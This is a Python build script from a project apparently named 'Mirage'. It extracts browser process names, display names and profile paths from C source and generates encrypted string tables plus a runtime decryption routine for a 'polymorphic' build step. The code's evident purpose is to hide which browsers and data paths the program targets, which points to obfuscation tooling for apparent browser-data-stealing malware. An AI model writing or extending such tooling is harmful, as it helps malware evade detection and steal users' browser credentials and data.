#!/usr/bin/env python3
"""
Generate encrypted browser table entries for make_polymorphic.py and
an init function for browser_paths.c.

Run from Mirage root: python tools/gen_bp_tables.py
"""
import os
import re

ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
BP_C = os.path.join(ROOT, "src", "browsers", "browser_paths.c")
MP_PY = os.path.join(ROOT, "tools", "make_polymorphic.py")

# ── 1. Read arrays from browser_paths.c ──────────────────────────

with open(BP_C, "r", encoding="utf-8") as f:
    src = f.read()

def extract_array(name, src):
    """Extract a static const char *name[] = { ... }; array."""
    pat = rf'static const char \*{name}\[\] = \{{([^}}]+)\}};'
    m = re.search(pat, src, re.DOTALL)
    if not m:
        raise ValueError(f"Array {name} not found")
    body = m.group(1)
    return re.findall(r'"([^"]*)"', body)

proc_names = extract_array("xor_process_names", src)
browser_names = extract_array("xor_names", src)
browser_paths_arr = extract_array("xor_paths", src)

print(f"Found {len(proc_names)} process names, {len(browser_names)} browser names, {len(browser_paths_arr)} paths")

# ── 2. Get unique strings per table ──────────────────────────────

def unique_preserve_order(lst):
    seen = set()
    out = []
    for s in lst:
        if s not in seen:
            seen.add(s)
            out.append(s)
    return out

unique_procs = unique_preserve_order(proc_names)
unique_names = unique_preserve_order(browser_names)
unique_paths = unique_preserve_order(browser_paths_arr)

print(f"Unique: {len(unique_procs)} procs, {len(unique_names)} names, {len(unique_paths)} paths")

proc_idx = {s: i for i, s in enumerate(unique_procs)}
name_idx = {s: i for i, s in enumerate(unique_names)}
path_idx = {s: i for i, s in enumerate(unique_paths)}

# ── 3. Generate make_polymorphic.py entries ──────────────────────

lines = []
lines.append("        # Phase 31: Browser table entries (auto-generated)")
lines.append("        # Process names")
for i, s in enumerate(unique_procs):
    escaped = s.replace("\\", "\\\\")
    lines.append(f'        ("bp_proc_{i}", "{escaped}"),')
lines.append("        # Browser display names")
for i, s in enumerate(unique_names):
    escaped = s.replace("\\", "\\\\")
    lines.append(f'        ("bp_name_{i}", "{escaped}"),')
lines.append("        # Browser paths")
for i, s in enumerate(unique_paths):
    escaped = s.replace("\\", "\\\\")
    lines.append(f'        ("bp_path_{i}", "{escaped}"),')

entries_text = "\n".join(lines)

# ── 4. Generate C init function ──────────────────────────────────

c_lines = []
c_lines.append("/* Auto-generated by gen_bp_tables.py - runtime-decrypted browser tables */")
c_lines.append("")
c_lines.append("static void init_browser_tables(void) {")
c_lines.append("    if (initialized) return;")
c_lines.append("")

# Decrypt unique process names
for i, s in enumerate(unique_procs):
    c_lines.append(f'    static char _proc_{i}[32];')
    c_lines.append(f'    enc_decrypt(enc_bp_proc_{i}, ENC_BP_PROC_{i}_LEN, _proc_{i});')
c_lines.append("")

# Decrypt unique browser names
for i, s in enumerate(unique_names):
    c_lines.append(f'    static char _name_{i}[64];')
    c_lines.append(f'    enc_decrypt(enc_bp_name_{i}, ENC_BP_NAME_{i}_LEN, _name_{i});')
c_lines.append("")

# Decrypt unique browser paths
for i, s in enumerate(unique_paths):
    c_lines.append(f'    static char _path_{i}[256];')
    c_lines.append(f'    enc_decrypt(enc_bp_path_{i}, ENC_BP_PATH_{i}_LEN, _path_{i});')
c_lines.append("")

# Assign to browser table
c_lines.append("    /* Assign to browser table */")
for i, (pn, bn, bp) in enumerate(zip(proc_names, browser_names, browser_paths_arr)):
    pi = proc_idx[pn]
    ni = name_idx[bn]
    ppi = path_idx[bp]
    c_lines.append(f"    browsers[{i}].name         = _name_{ni};")
    c_lines.append(f"    browsers[{i}].path_suffix  = _path_{ppi};")
    c_lines.append(f"    browsers[{i}].use_roaming  = 0;")
    c_lines.append(f"    browsers[{i}].process_name = _proc_{pi};")

c_lines.append("    /* Opera and Opera GX use APPDATA */")
c_lines.append("    browsers[5].use_roaming = 1;")
c_lines.append("    browsers[6].use_roaming = 1;")
c_lines.append("    initialized = 1;")
c_lines.append("}")

c_text = "\n".join(c_lines)

# ── 5. Write outputs ─────────────────────────────────────────────

init_c_path = os.path.join(ROOT, "src", "browsers", "bp_tables_init.inc")
with open(init_c_path, "w", encoding="utf-8") as f:
    f.write(c_text)
print(f"Wrote {init_c_path}")

mp_entries_path = os.path.join(ROOT, "tools", "bp_entries.inc")
with open(mp_entries_path, "w", encoding="utf-8") as f:
    f.write(entries_text)
print(f"Wrote {mp_entries_path}")

print()
print("=== NEXT STEPS ===")
print(f"1. Append contents of {mp_entries_path} to make_polymorphic.py strings list")
print(f"2. Replace init_browsers() in browser_paths.c with content of {init_c_path}")
print(f"3. Run: python tools/make_polymorphic.py")
print(f"4. Build and test")
